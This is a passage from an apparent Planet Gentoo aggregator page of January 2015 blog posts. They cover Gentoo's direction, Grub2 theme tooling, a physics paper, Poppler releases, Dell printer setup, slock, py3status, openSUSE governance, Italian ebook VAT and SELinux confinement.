  • An important word of advice may come from a child.
  • Someone is looking up to you. Don’t let that person down.

I think that the third one is especially true in these times. With many political, social, economic, and societal decisions being made without full support of the people, it is necessary for individuals to express discontent before any change can begin. The fourth one is incredibly important to remember. We all too often forget that children can show us different ways of looking at otherwise maladroit or stale situations. They can enlighten us and open our eyes to perspectives that we may not have considered with our “adult” worldviews. I’m reminded of the recent Why advertisement from Charles Schwab:

It also ties nicely to the final one that I posted today. We need to remember to always act with integrity because there is always someone looking up to us, and modelling his or her behaviours after our own.

Good stuff, but like the previous post, I think that there was less of an emphasis on the funnier side of the fortune cookies. Hopefully I’ll get some new funny ones soon.

Cheers,
Zach

Donnie Berkholz a.k.a. dberkholz (homepage, bugs)
Gentoo needs focus to stay relevant (January 14, 2015, 03:36 UTC)

After nearly 12 years working on Gentoo and hearing blathering about how “Gentoo is about choice” and “Gentoo is a metadistribution,” I’ve come to a conclusion to where we need to go if we want to remain viable as a Linux distribution.

If we want to have any relevance, we need to have focus. Everything for everybody is a guarantee that you’ll be nothing for nobody. So I’ve come up with three specific use cases for Gentoo that I’d like to see us focus on:

People developing software

As Gentoo comes, by default, with a guaranteed-working toolchain, it’s a natural fit for software developers. A few years back, I tried to set up a development environment on Ubuntu. It was unbelievable painful. More recently, I attempted the same on a Mac. Same result — a total nightmare if you aren’t building for Mac or iOS.

Gentoo, on the other hand, provides a proven-working development environment because you build everything from scratch as you install the OS. If you need headers or some library, it’s already there. No problem. Whereas I’ve attempted to get all of the barebones dev packages installed on many other systems and it’s been hugely painful.

Frankly, I’ve never come across as easy of a dev environment as Gentoo, if you’ve managed to set it up as a user in the first place. And that’s the real problem.

People who need extreme flexibility (embedded, etc.)

Nearly 10 years ago, I founded the high-performance clustering project in Gentoo, because it was a fantastic fit for my needs as an end user in a higher-ed setting. As it turns out, it was also a good fit for a number of other folks, primarily in academia but also including the Adelie Linux team.

What we found was that you could get an extra 5% or so of performance out of building everything from scratch. At small scale that sounds absurd, but when that translates into 5-6 digits or more of infrastructure purchases, suddenly it makes a lot more sense.

In related environments, I worked on porting v5 of the Linux Terminal Server Project (LTSP) to Gentoo. This was the first version that was distro-native vs pretending to be a custom distro in its own right, and the lightweight footprint of a diskless terminal was a perfect fit for Gentoo.

In fact, around the same time I fit Gentoo onto a 1.8MB floppy-disk image, including either the dropbear SSH client or the kdrive X server for a graphical environment. This was only possible through the magic of the ROOT and PORTAGE_CONFIGROOT variables, which you couldn’t find in any other distro.

Other distros such as ChromeOS and CoreOS have taken similar advantage of Gentoo’s metadistribution nature to build heavily customized Linux distros.

People who want to learn how Linux works

Finally, another key use case for Gentoo is for people who really want to understand how Linux works. Because the installation handbook actually works you through the entire process of installing a Linux distro by hand, you acquire a unique viewpoint and skillset regarding what it takes to run Linux, well beyond what other distros require. In fact I’d argue that it’s a uniquely portable and low-level skillset that you can apply much more broadly than those you could acquire elsewhere.

In conclusion

I’ve suggested three core use cases that I think Gentoo should focus on. If it doesn’t fit those use cases, I would suggest that we allow but not specifically dedicate effort to enabling those particulars.

We’ve gotten overly deadened to how people want to use Linux, and this is my proposal as to how we could regain it.


Tagged: gentoo

January 12, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Tool to preview Grub2 themes easily (using KVM) (January 12, 2015, 21:04 UTC)

The short version: To preview a Grub2 theme live does not have to be hard.

Hi!

When I first wrote about a (potentially to lengthy) way to make a Grub2 theming playground in 2012, I was hoping that people would start throwing Gentoo Grub2 themes around so that it would become harder picking one rather than finding one. As you know, that didn’t happen.

Therefore, I am taken a few more steps now:

So this post is about that new tool: grub2-theme-preview. Basically, it does the steps I blogged about in 2012, automated:

  • Creates a sparse disk as a regular file
  • Adds a partition to it and formats using ext2
  • Installs Grub2, copies a theme of your choice and a config file to make it work
  • Starts KVM

That way, a theme creator can concentrate on the actual work on the theme.

To give an example, to preview theme “Archxion” off GitHub as of today you could run:

git clone https://github.com/hartwork/grub2-theme-preview.git
git clone https://github.com/Generator/Grub2-themes.git
cd grub2-theme-preview
./grub2-theme-preview ../Grub2-themes/Archxion/

Once grub2-theme-preview has distutils/setuputils packaging and a Gentoo ebuild, that gets a bite easier, still.

The current usage is:

# ./grub2-theme-preview --help
usage: grub2-theme-preview [-h] [--image] [--grub-cfg PATH] [--version] PATH

positional arguments:
  PATH             Path of theme directory (or image file) to preview

optional arguments:
  -h, --help       show this help message and exit
  --image          Preview a background image rather than a whole theme
  --grub-cfg PATH  Path grub.cfg file to apply
  --version        show program's version number and exit

Before using the tool, be warned that:

  • it is alpha/beta software that
  • needs root permissions in some part (calling sudo).
  • So I don’t take any warranty for anything right now!

Here is what to expect from running

# ./grub2-theme-preview /usr/share/grub/themes/gutsblack-archlinux/

assuming you have grub2-themes/gutsblack-archlinux off the grub2-themes overlay installed with this grub.cfg file:

Another example using the --image switch for background-image-only themes, using a 640×480 rendering of vector remake of gentoo-cow:


The latter is a good candidate for that Grub2 version of media-gfx/grub-splashes I mentioned earlier.

I’m looking forward to your patches and pull requests!

 

New Gentoo overlay: grub2-themes (January 12, 2015, 20:38 UTC)

Hi!

I’ve been looking around for Grub2 themes a bit and started a dedicated overlay to not litter the main repository. The overlay

Any Gentoo developer on GitHub probably has received a

[GitHub] Subscribed to gentoo/grub2-themes-overlay notifications

mail already. I did put it into Gentoo project account rather than my personal account because I do not want this to be a solo project: you are welcome to extend and improve. That includes pull requests from users.

The licensing situation (in the overlay, as well as with Grub2 themes in general) is not optimal. Right now, more or less all of the themes have all-rights-reserved for a license, since logos of various Linux distributions are included. So even if the theme itself is licensed under GPL v2 or later, the whole thing including icons is not. I am considering to add a use flag icons to control cutting the icons away. That way, people with ACCEPT_LICENSE="-* @FREE" could still use at least some of these themes. By the way, I welcome help identifying the licenses of each of the original distribution logos, if that sounds like an interesting challenge to you.

More to come on Grub2 themes. Stay tuned.

Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

Today's good news is that our manuscript "Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube" has been accepted for publication by New Journal of Physics.
In a way, this work is directly building on our previous publication on thermally induced quasiparticles in niobium-carbon nanotube hybrid systes. As a contribution mainly from our theory colleagues, now the modelling of transport processes is enhanced and extended to cotunneling processes within Coulomb blockade. A generalized master equation based on the reduced density matrix approach in the charge conserved regime is derived, applicable to any strength of the intradot interaction and to finite values of the superconducting gap.
We show both theoretically and experimentally that also in cotunneling spectroscopy distinct thermal "replica lines" due to the finite quasiparticle occupation of the superconductor occur at higher temperature T~1K: the now possible transport processes lead to additional conductance both at zero bias and at finite voltage corresponding to an excitation energy; experiment and theoretical result match very well.

"Thermally induced subgap features in the cotunneling spectroscopy of a carbon nanotube"
S. Ratz, A. Donarini, D. Steininger, T. Geiger, A. Kumar, A. K. Hüttel, Ch. Strunk, and M. Grifoni
New J. Phys. 16, 123040 (2014), arXiv:1408.5000 (PDF)

http://www.akhuettel.de/publications/forschung.pdf
The 4/2014 edition of the "forschung" magazine of the DFG, published just a few days ago, includes an article about the work of our research group (in German)! Enjoy!

"Zugfest, leitend, defektfrei"
Kohlenstoff-Nanoröhren sind ein faszinierendes Material. In Experimenten bei ultratiefen Temperaturen versuchen Physiker, ihre verschiedenen Eigenschaften miteinander in Wechselwirkung zu bringen – und so Antworten auf grundlegende Fragen zu finden.
Andreas K. Hüttel
forschung 4/2014, 10-13 (2014) (PDF)

January 10, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)
Poppler is contributing to global warming (January 10, 2015, 19:48 UTC)


As you may have noticed by now if you're running ~arch, the Poppler release policies have changed.

Previously Poppler (app-text/poppler) used to have stable branches with even middle version number, say e.g. 0.24, and bug fix releases 0.24.1, 0.24.2, 0.24.3, ... but a (most of the times) stable ABI. This meant that such upgrades could be installed without the need to rebuild any applications using Poppler. Development of new features took place in git master or in the development releases such as, say, 0.25.1, with odd middle number; these we never packaged in Gentoo anyway.

Now, the stable branches are gone, and Poppler has moved to a flat development model, with the 0.28.1 stable release (stable as intended by upstream, not "Gentoo stable") being followed by 0.29.0 and now 0.30.0 another month later. Unsurprisingly the ABI and the soversion of libpoppler.so has changed each time, triggering in Gentoo a rebuild of all applications linking to libpoppler.so. This includes among other things LuaTeX, Inkscape, and LibreOffice (wheee).

From a Gentoo maintainer point of view, the new schedule is not so bad; the API changes are minor (if any), and packages mostly "just compile". The only thing left to do is to check for soversion increases and bump the package subslot for the automated rebuild. We're much better off than all the binary distributions, since we can just keep tracking new Poppler releases and do not need to backport e.g. critical bug fixes ourselves just so the binary package fits to all the other binary packages of the distro.

From a Gentoo user point of view... well, I guess you can turn the heating down a bit. If you are running ~arch you will probably see some more LibreOffice rebuilds in the upcoming future. If things get too bad, you can always mask a new poppler version in /etc/portage/package.mask yourself (but better check for security bugs then, glsa-check from app-portage/gentoolkit is your friend); if the number of rebuilds gets completely out of hand, we may consider adding e.g. every second Poppler version only package-masked to the portage tree.

Aaron W. Swenson a.k.a. titanofold (homepage, bugs)
Dell 1350cnw on Gentoo Linux with CUPS (January 10, 2015, 13:00 UTC)

You’d think that a company that had produced and does produce some Linux based products would also provide CUPS drivers for their printers, like the Dell 1350cnw. Not so, it seems. Still, I was undeterred and found a way to make it happen.

First, download the driver for the Xerox Phaser 6000 in DEB format. Yeah, that’s right. We’re going to use a Xerox driver to print to our Dell printer.

Once you have it, do the following on the command line:

# unzip 6000_6010_deb_1.01_20110210.zip
# cd deb_1.01_20110210
# ar x xerox-phaser-6000-6010_1.0-1_i386.deb
# tar xf data.tar.gz
# gunzip usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd.gz
# mkdir -p /usr/lib/cups/filter/
# cp ~/deb_1.01_20110210/usr/lib/cups/filter/xrhkaz* /usr/lib/cups/filter/
# mkdir -p /usr/share/cups/Xerox/dlut/
# cp ~/deb_1.01_20110210/usr/share/cups/Xerox/dlut/Xerox_Phaser_6010.dlut /usr/share/cups/Xerox/dlut/

Or, because I’ve seen rumors that there are other flavors of Linux, if you’re on a distribution that supports DEB files, just initiate the install from the DEB file, however one does that.

Finally, add the Dell 1350cnw via the CUPS browser interface. (I used whichever one had “net” in the title as the printer is connected directly to the network.) Upload  ~/deb_1.01_20110210/usr/share/ppd/Xerox/Xerox_Phaser_6000B.ppd when prompted for a driver.

Everything works as expected for me, and in color!

January 09, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)

I finally took the time to watch The Perl Jam: Exploiting a 20 Year-old Vulnerability [31c3]. Oh, my, god.

January 07, 2015
Nathan Zachary a.k.a. nathanzachary (homepage, bugs)
Slock 1.2 background colour (January 07, 2015, 02:41 UTC)

In a previous post, I discussed the method for changing the background colour for slock 1.1. Now that slock 1.2 is out, and is in the Portage tree in Gentoo, the ‘savedconfig’ USE flag is a little different than it used to be. In 1.1, the ‘savedconfig’ USE flag would essentially copy the config.mk file to /etc/portage/savedconfig/x11-misc/slock-$version. Now, in slock 1.2, there is still a config file in that location, but it is not just a copy of the config.mk file. Rather, one will see the following two-line file:

# cat /etc/portage/savedconfig/x11-misc/slock-1.2
#define COLOR1 "black"
#define COLOR2 "#005577"

As indicated in the file, you can use either a name for a generic colour (like “black”) or the hex representation for the colour of your choice (see The Color Picker for an easy way to find the hex code for your colours).

There are two things to keep in mind when editing this file:

  • The initial hash (#) is NOT indicating a comment, and MUST remain. If you remove it, slock 1.2 will fail to compile
  • The COLOR1 variable is for the default colour of the background, whilst the COLOR2 variable is for the background colour once one starts typing on a slocked screen

Hope that this information helps for those people using slock (especially within Gentoo Linux).

Cheers,
Zach

January 06, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
Finding a better blog workflow (January 06, 2015, 00:12 UTC)

I have been ranting about editors in the past few months, an year after considering shutting the blog down. After some more thinking out and fighting, I have now a better plan and the blog is not going away.

First of all, I decided to switch my editing to Draft and started paying for a subscription at $3.99/month. It's a simple-as-it-can-be editor, with no pretence. It provides the kind of "spaced out" editing that is so trendy nowadays and it provides a so-called "Hemingway" mode that does not allow you to delete. I don't really care for it, but it's not so bad.

More importantly it gets the saving right: if the same content is being edited in two different browsers, one gets locked (so I can't overwrite the content), and a big red message telling me that it can't save appears the moment I try to edit something and the Internet connection goes away or I get logged out. It has no fancy HTML editor, and instead is designed around Markdown, which is what I'm using nowadays to post on my blog as well. It supports C-i and C-b with it just fine.

As for the blog engine I decided not to change it. Yet. But I also decided that upgrading it to Publify is not an option. Among other things, as I went digging trying to fix a few of the problems I've been having I've discovered just how spaghetti-code it was to begin with, and I lost any trust in the developers. Continuing to build upon Typo without taking time to rewrite it from scratch is in my opinion time wasted. Upstream's direction has been building more and more features to support Heroku, CDNs, and so on so forth — my target is to make it slimmer so I started deleting good chunks of code.

The results have been positive, and after some database cleanup and removing support for structures that never were implemented to begin with (like primary and hierarchical categories), browsing the blog should be much faster and less of a pain. Among the features I dropped altogether is the theming, as the code is now very specific to my setup, and that allowed me to use the Rails asset pipeline to compile the stylesheets and javascripts; this should lead to faster load time for all (even though it also caused a global cache invalidation, sorry about that!)

My current plan is to not spend too much time on the blog engine in the next few weeks, as it reached a point where it's stable enough, but rather fix a few things in the UI itself, such as the Amazon ads loading that are currently causing some things to jump across the page a little too much. I also need to find a new, better way to deal with image lightboxes — I don't have many in use, but right now they are implemented with a mixture of Typo magic and JavaScript — ideally I'd like for the JavaScript to take care of everything, attaching itself to data-fullsize-url attributes or something like that. But I have not looked into replacements explicitly yet, suggestions welcome. Similarly, if anybody knows a good JavaScript syntax highligher to replace coderay, I'm all ears.

Ideally, I'll be able to move to Rails 4 (and thus Passenger 4) pretty soon. Although I'm not sure how well that works with PostgreSQL. Adding (manually) some indexes to the tables and especially making sure that the diamond-tables for tags and categories did not include NULL entries and had a proper primary key being the full row made quite the difference in the development environment (less so in production as more data is cached there, but it should still be good if you're jumping around my old blog posts!)

Coincidentally, among the features I dropped off the codebase I included the update checks and inbound links (that used the Google Blog Search service that does not exist any more), making the webapp network free — Akismet stopped working some time ago and that is one of the things I want to re-introduce actually, but then again I need to make sure that the connection can be filtered correctly.

By the way, for those who are curious why I spend so much time on this blog: I have been able to preserve all the content I could, from my first post on Planet Gentoo in April 2005, on b2evolution. Just a few months shorts of ten years now. I also was able to recover some posts from my previous KDEDevelopers blog from February that years and a few (older) posts in Italian that I originally sent to the Venice Free Software User Group in 2004. Which essentially means, for me, over ten years of memories and words. It is dear to me and most of you won't have any idea how much — it probably also says something about priorities in my life, but who cares.

I'm only bothered that I can't remember where I put the backup from blogspot I made of what I was writing when I was in high school. Sure it's not exactly the most pleasant writing (and it was all in Italian), but I really would like for it to be part of this single base. Oh and this is also the reason why you won't see me write more on G+ or Facebook — those two and Twitter are essentially just a rant platform to me, but this blog is part of my life.

January 05, 2015
Sebastian Pipping a.k.a. sping (homepage, bugs)
Gentoo Grub 2.x theme? (January 05, 2015, 22:11 UTC)

Hi!

It’s 2015 and I have not heard of any Gentoo GRUB 2.x themes, yet. Have you?

If you could imagine working on a theme based on the vector remake of gentoo-cow (with sound licensing), please get in touch!

CoreOS is based on… Gentoo! (January 05, 2015, 16:39 UTC)

I first heard about CoreOS from LWN.net in the news item on Rocket, CoreOS’s fork/re-write of Docker.

I ran into CoreOS again on 31c3 and learned it is based on… Gentoo! A few links for proof:

January 04, 2015
Andreas K. Hüttel a.k.a. dilfridge (homepage, bugs)

I'm posting this here because a new LibreOffice version was stabilized two days ago, and at the same time a hidden bug crept in...

Because of an unintended interaction between a python-related eclass and the app-office/libreoffice ebuilds (any version), merging recently self-generated (see below for exact timeframe) libreoffice binary packages can fail to install with the error

* ERROR: app-office/libreoffice-4.3.5.2::gentoo failed (setup phase):
* PYTHON_CFLAGS is invalid for python-r1 suite, please take a look @ https://wiki.gentoo.org/wiki/Project:Python/Python.eclass_conversion#PYTHON_CFLAGS 

The problem is fixed now, but any libreoffice binary packages generated with a portage tree from Fri Jan 2 00:15:15 2015 UTC to Sun Jan 4 22:18:12 2015 UTC will fail to reinstall. Current recommendation is to delete the self-generated binary package and re-install libreoffice from sources (or use libreoffice-bin).

This does NOT affect app-office/libreoffice-bin.

Updates may be posted here or on bug 534726. Happy heating. At least it's winter.

Alexys Jacob a.k.a. ultrabug (homepage, bugs)
py3status v2.0 (January 04, 2015, 19:16 UTC)

I’m very pleased to announce the release of py3status v2.0 which I’d like to dedicate to the person who’s behind all the nice improvements this release features : @tablet-mode !

His idea on issue #44 was to make py3status modules configurable. After some thoughts and merges of my own plans of development, we ended up with what I believe are the most ambitious features py3status provides so far.

Features

The logic behind this release is that py3status now wraps and extends your i3status.conf which allows all the following crazy features :

For all your i3bar modules i3status and py3status alike thanks to the new on_click parameter which you can use like any other i3status.conf parameter on all modules. It has never been so easy to handle click events !

This is a quick and small example of what it looks like :

# run thunar when I left click on the / disk info module
disk / {
    format = "/ %free"
    on_click 1 = "exec thunar /"
}
  • All py3status contributed modules are now shipped and usable directly without the need to copy them to your local folder. They also get to be configurable directly from your i3status config (see below)

No need to copy and edit the contributed py3status modules you like and wish to use, you can now load and configure them directly from your i3status.conf.

All py3status modules (contributed ones and user loaded ones) are now loaded and ordered using the usual syntax order += in your i3status.conf !

  • All modules have been improved, cleaned up and some of them got some love from contributors.
  • Every click event now triggers a refresh of the clicked module, even for i3status modules. This makes your i3bar more responsive than ever !

Contributors

  • @AdamBSteele
  • @obb
  • @scotte
  • @tablet-mode

Thank you

  • Jakub Jedelsky : py3status is now packaged on Fedora Linux.
  • All of you users : py3status has broken the 100 stars on github, I’m still amazed by this. @Lujeni’s phrophecy has come true :)
  • I still have some nice ideas in stock for even more functionalities, stay tuned !

Michal Hrusecky a.k.a. miska (homepage, bugs)
Challenges in 2015 (January 04, 2015, 13:34 UTC)

Champagne Showers by Merlin2525You might have noticed that I decided to run for the openSUSE Board. And as we shortly have a new year and everybody is evaluating the past and the future, I will do the similar, mainly focusing on few of the challenges that I see laying in front of the openSUSE Board in 2015.

SUSE/openSUSE relation

I heard it being mentioned several times over and over. SUSE and openSUSE are two different things. But at the same time, they are pretty close. Close enough to be confusing. We have similar yet slightly distinct branding. Similar yet slightly distinct name and we have a clear overlap in terms of contributors. For people inside the project, it is easy to distinguish the entities. For people outside, not so much.

There was a nice talk by Zvezdana and Kent on openSUSE Conference about our branding. Part of the talk and one thing that people notice about openSUSE and SUSE is our logo. SUSE keeps updating it and it’s getting different over the time. On the other hand openSUSE logo stays the same. One open question from the talk was how to fix it. Either start diverging with our branding or get closer together. I know this is mainly question for the artwork team, but as will affect all of us, there should be broad discussion and as it involves logo and trademark, there need to be SUSE and board involved.

Apart from the logo/branding, there is also a technical aspect of the relation. We all say that openSUSE is the technical upstream of SLE. Things are being developed and tested in openSUSE and then adopted by SLE. But sometimes it is vice versa, as SUSE needs to develop some feature for SLE or one of it’s service packs and push it there. And as SLE and openSUSE schedules are unrelated, sometimes they can’t push it in openSUSE first. Even after the release openSUSE and SLE starts diverging and come together once in five years or so when it is a time to release a new SLE. It’s kinda shame, that we can’t help each other more often. It would be great to get SLE and openSUSE closer together in mutually beneficial way. But this is not going to be an easy nor fast discussion, again involving quite some teams/people. And I believe the Board should act as mediator/initiator in this discussion as well.

openSUSE Release

While talking about the release, we still have officially 8 months release cycle (or more precisely whenever coolo says so release cycle). It would be nice to have some decision that since we release two last releases after 12 months, maybe we are switching to one year release cycle. Or decide to stick with eight months. Or go for something completely different. But again, the point is, this is the hard discussion to have, but I beleive we have to start it and have a clear outcome of it, so people can kinda count on it. There is not much for board to do in this apart from calming heated discussion, but maybe it would make a sense to delay start of this discussion after the SLE openSUSE relation discussion (which probably needs to have board involved) and take the results of it into account. I personally think it definitely makes sense to at least align SLE and openSUSE schedules a little bit…

Conference

Last year we had a great conference in Dubrovnik. It was an awesome place, quite some interesting discussions as every year, but unfortunately not that many people. I liked it and hats off to the organizers, but we need to figure out what went wrong and why not so many people showed up in person. I hope for the best in Hague and that this years conference will see again plenty of people, but although the last conference was great, loosing people attending our most important event – openSUSE Conference – was also kinda disturbing… So we will see what happens in the Hague.

The rest

I’m sure there will be other challenges as well. In fact, even I would like more stuff to happen in the current year. But for those things, I don’t need a board, I can do or at least start them myself. Those few that I just mentioned are only those that I see as important, in need of some involvement from the board and being not yet entirely solved from the last year. Hopefully all of them will be solved in next year and we will have different problems, like how to find even the most subtle bugs as all other ones are solved and how to change the world for the better and whether is there still anything left to improve after everything we did in 2015 :-)

January 03, 2015
Diego E. Pettenò a.k.a. flameeyes (homepage, bugs)
The Italian ISBN fraud (January 03, 2015, 17:12 UTC)

Books
Photo credit: Moyan Brenn

The title of the post is probably considered clickbait, but I think there is a fraud going on in Italy related to ISBN, and since I noted on my Facebook page that I have more information on this than the average person, even those who are usually quite well informed, I thought it's worth putting it down on paper.

It all started with an email I got from Amazon, in particular from the Kindle Direct Publishing service, which is how I publish Autotools Mythbuster as a Kindle book. At first I thought it was about the new VAT regulation for online services across Europe that are being announced by everybody and that will soon make most website give you ex-VAT prices and let you figure out how much you're actually paying. And indeed it was, until you get to this post-script:

Lastly, as of January 1, 2015, Italy has put in place a new law. Applicable VAT for eBooks sold in Italy will depend on whether the book has an ISBN. All eBooks with an ISBN will have a 4% VAT rate and eBooks without an ISBN will have a 22% VAT rate. This is the rate that is added to your price on January 1st and is the rate deducted when an Italian customer purchases your book. If you obtain an ISBN after January 1st, the 4% VAT rate will then apply for future sales but we will not adjust your list price automatically.

Since I've always felt strongly that discriminating books on whether they are paper or bits is a bad idea, the reduced VAT rate for books was actually good news, but tying it to the ISBN? Not so much. And here's why.

First of all, let's bust the myth of the ISBN being a requirement to publish a book. It's not, at least not universally. In particular, it's not a requirement in either Italy, Republic of Ireland or the United States of America. It is also not clear for many that in many countries, including at least Italy and Republic of Ireland, it's privately held companies that manage the ISBN distribution. In other countries there's a government agency to do that, and it may well be that it's more regulated there.

In the case of the UK agency (that also handles Republic of Ireland and is thus relevant to me), they make also explicit that there are plenty of situations in which you should not apply an ISBN, for instance for booklets that are not sold to the public (private events, museums, etc.). It might sound odd, but it makes perfect sense the moment when you realize what ISBN was designed to help with: distribution. The idea behind it is that any single edition of a book would have an unique code, so when your bookstore orders from the distributor, and the distributor from the publisher, you have the same ID over the place. A secondary benefit for citing references and bibliographies is often cited, but it is by far not the reason why ISBN was introduced.

So why would you tie the VAT rate on the presence of an ISBN? I can't think of any particular good reason off the top of my head. It makes things quite more complex for online ebook stores, especially those that have not been limited to stocking books with an ISBN to begin with (such as Amazon, Kobo, …). But even more so it makes it almost impossible for authors to figure out how to charge the buyers, if they are both in Europe. All is still easy of course if you're not trying to sell to Europe, or from Europe — wonder why we don't have more European startups, eh?

The bothersome part is that there is no such rule about VAT for physical books! Indeed many people in Italy are acquainted with schemes in which you join a "club" that would send you a book every month (unless you opt-out month by month, and if you don't you have to pay the price for it), and would sell books at a price much lower than the bookstore.

I'm sure they still exist although I'm not sure if Amazon makes them any interesting now, it was how I got into Lord of the Rings, as I ended up paying some €1.25 for it rather than the price of €30 for the same (hardcover) edition.

All those books were printed especially for the "club" and would thus not have an ISBN attached to them at all. One of the reason was probably to make it more difficult to sell them back second hand. But they have always been charged at 4% VAT anyway!

But the problems run further and that's hard to see for most consumers because they don't realize just how difficult the ISBN system is to navigate. Especially for "live" books like Autotools Mythbuster, every single revision needs its own unique ISBN — and since I usually do three to four updates to the book every year, that would be at least four different ISBNs per year. Add to that the fact that agencies decided that "ebook" is not a format, ePub, Mobi and PDF are, and you end up requiring multiple ISBNs per revision to cover for these formats.

Assume only two formats are needed for Autotools Mythbuster, which is only available om Amazon and Kobo. Assume three revisions an year (I would like to do more, I plan on spending more of 2015 writing documentation as I'm doing less hands-on work in Open Source lately). Now you need six ISBNs per year. If I was living in Canada, the problem is solved to begin with – ISBNs assignments in Canada are free – but I live in Ireland, and Nielsen is a for-profit company (I'll leave Italy aside for a moment, will go back to it later). If I were to buy a block of 10 codes (the minimum amount), I would have to pay £120 plus VAT and that would last me for almost two years — but that requires me making some €300-400 in royalties over those two years to break even on the up-front cost — there are taxes to be payed over the royalties, you know.

This means well over two hundreds copies of the book to be sold — I would love to, but I'm sure there aren't that many people interested in what I write. Not the two hundreds, but two hundreds every year — every update would have a hidden cost due to the ISBN needing to be updated, and if you provide the update for free (as I want to do), then you need to sell more copies incrementally.

Now I said above I'll leave Italy aside — here is why: up until now, the Italian agency for ISBN assignment only allowed publishers to buy blocks of ISBN codes — independent authors had no choice and could not get an ISBN at all. It probably had something to do with the fact that the agency is owned by the Italian publishers association (Associazione Italiana Editori). Admittedly the price is quite more affordable if you are a publisher as it is €30 to join and €50 every 10 codes.

But of course with the new law coming into effect it would have been too much of a discrimination against independent authors to not allow them to get ISBNs at all. So the agency decided that starting this January (or rather, starting from next week, as they are on vacation until the 7th) they will hand out individual ISBNs for "authorpublishing" — sic, in English, I wonder how drunk they were to come up with such a term, when the globally used term would be self-publishing. Of course the fee for those is €25 per code instead, five times as expensive as a publisher would pay for them.

And there is no documentation on how to apply for those yet, because of course they are on vacation still (January 6th is holiday in Italy, it's common for companies, schools, etc. to take the whole first week off.) and of course they only started providing the numbers when the law entered into effect, to avoid the discrimination. But of course it means that until the authors can find the time to look into the needed documentation, they will be discriminated. Again, only in Italy, as the rest of Europe does not have any such silly rule.

Now, at least a friend of mine was happy that at least for the majority of the ebooks we'll see a reduced VAT — but will we? I doubt so, as with any VAT change, prices will likely remain the same. When VAT increased from 20% to 21%, stores advertised the increased price for a week, then they came back to what they were before — because something priced at €3.99 wouldn't remain priced at €4.02 for long, it's even less convenient. In this case, I doubt that any publisher will change their MSRP for the ebooks to match the reduced VAT — I think the only place where this is going to make a difference is Amazon, as their KDP interface now matches the US price to the ex-VAT price of the books, so that the prices across Amazon websites no longer match across markets as they apply the local VAT, but I wouldn't be surprised that publishers would still set a MSRP to Amazon to match the same in-VAT price before and after the 22%→4% change, essentially increasing by over 10% their margin.

I'm definitely unconvinced of the new VAT regulations in Europe; they are essentially designed as a protectionistic measure for the various countries' companies for online services. But right now they are just making it more complex for all the final customers to figure out how much they are paying, and Italy in particular they seem to just be trying to ruin the newly-renewed independent authors' market which has been, to me, a nice gift of modern ebook distribution.

Sven Vermeulen a.k.a. swift (homepage, bugs)

Large companies that handle their own IT often have internal support teams for many of the technologies that they use. Most of the time, this is for reusable components like database technologies, web application servers, operating systems, middleware components (like file transfers, messaging infrastructure, …) and more. All components that are used and deployed multiple times, and thus warrant the expenses of a dedicated engineering team.

Such teams often have (or need to write) secure configuration deployment guides, so that these components are installed in the organization with as little misconfigurations as possible. A wrongly configured component is often worse than a vulnerable component, because vulnerabilities are often fixed with the software upgrades (you do patch your software, right?) whereas misconfigurations survive these updates and remain exploitable for longer periods. Also, misuse of components is harder to detect than exploiting vulnerabilities because they are often seen as regular user behavior.

But next to the redeployable components, most business services are provided by a single application. Most companies don’t have the budget and resources to put dedicated engineering teams on each and every application that is deployed in the organization. Even worse, many companies hire external consultants to help in the deployment of the component, and then the consultants hand over the maintenance of that software to internal teams. Some consultants don’t fully bother with secure configuration deployment guides, or even feel the need to disable security constraints put forth by the organization (policies and standards) because “it is needed”. A deployment is often seen as successful when the software functionally works, which not necessarily means that it is misconfiguration-free.

As a recent example that I came across, consider an application that needs Node.js. A consultancy firm is hired to set up the infrastructure, and given full administrative rights on the operating system to make sure that this particular component is deployed fast (because the company wants to have the infrastructure in production before the end of the week). Security is initially seen as less of a concern, and the consultancy firm informs the customer (without any guarantees though) that it will be set up “according to common best practices”. The company itself has no engineering team for Node.js nor wants to invest in the appropriate resources (such as training) for security engineers to review Node.js configurations. Yet the application that is deployed on the Node.js application server is internet-facing, so has a higher risk associated with it than a purely internal deployment.

So, how to ensure that these applications cannot be exploited or, if an exploit is done, how to ensure that the risks involved with the exploit are contained? Well, this is where I believe SELinux has a great potential. And although I’m talking about SELinux here, the same goes for other similar technologies like TOMOYO Linux, grSecurity’s RBAC system, RSBAC and more.

SELinux can provide a container, decoupled from the application itself (but of course built for that particular application) which restricts the behavior of that application on the system to those activities that are expected. The application itself is not SELinux-aware (or does not need to be – some applications are, but those that I am focusing on here usually don’t), but the SELinux access controls ensure that exploits on the application cannot reach beyond those activities/capabilities that are granted to it.

Consider the Node.js deployment from before. The Node.js application server might need to connect to a MongoDB cluster, so we can configure SELinux to allow just that, but all other connections that originate from the Node.js deployment should be forbidden. Worms (if any) cannot use this deployment then to spread out. Same with access to files – the Node.js application probably only needs access to the application files and not to other system files. Instead of trying to run the application in a chroot (which requires engineering effort from those people implementing Node.js, which could be a consultancy firm that does not know or want to deploy within a chroot) SELinux is configured to disallow any file access beyond the application files.

With SELinux, the application can be deployed relatively safely while ensuring that exploits (or abuse of misconfigurations) cannot spread. All that the company itself has to do is to provide resources for a SELinux engineering team (which can be just a responsibility of the Linux engineering teams, but can be specialized as well). Such a team does not need to be big, as policy development effort is usually only needed during changes (for instance when the application is updated to also send e-mails, in which case the SELinux policy can be adjusted to allow that as well), and given enough experience, the SELinux engineering team can build flexible policies that the administration teams (those that do the maintenance of the servers) can tune the policy as needed (for instance through SELinux booleans) without the need to have the SELinux team work on the policies again.

Using SELinux also has a number of additional advantages which other, sometimes commercial tools (like Symantecs SPE/SCSP – really Symantec, you ask customers to disable SELinux?) severly lack.

  • SELinux is part of a default Linux installation in many cases. RedHat Enterprise Linux ships with SELinux by default, and actively supports SELinux when customers have any problems with it. This also improves the likelihood for SELinux to be accepted, as other, third party solutions might not be supported. Ever tried getting support for a system on which both McAfee AV for Linux and Symantec SCSP are running (if you got it to work together at all)? At least McAfee gives pointers to how to update SELinux settings when they would interfere with McAfee processes.
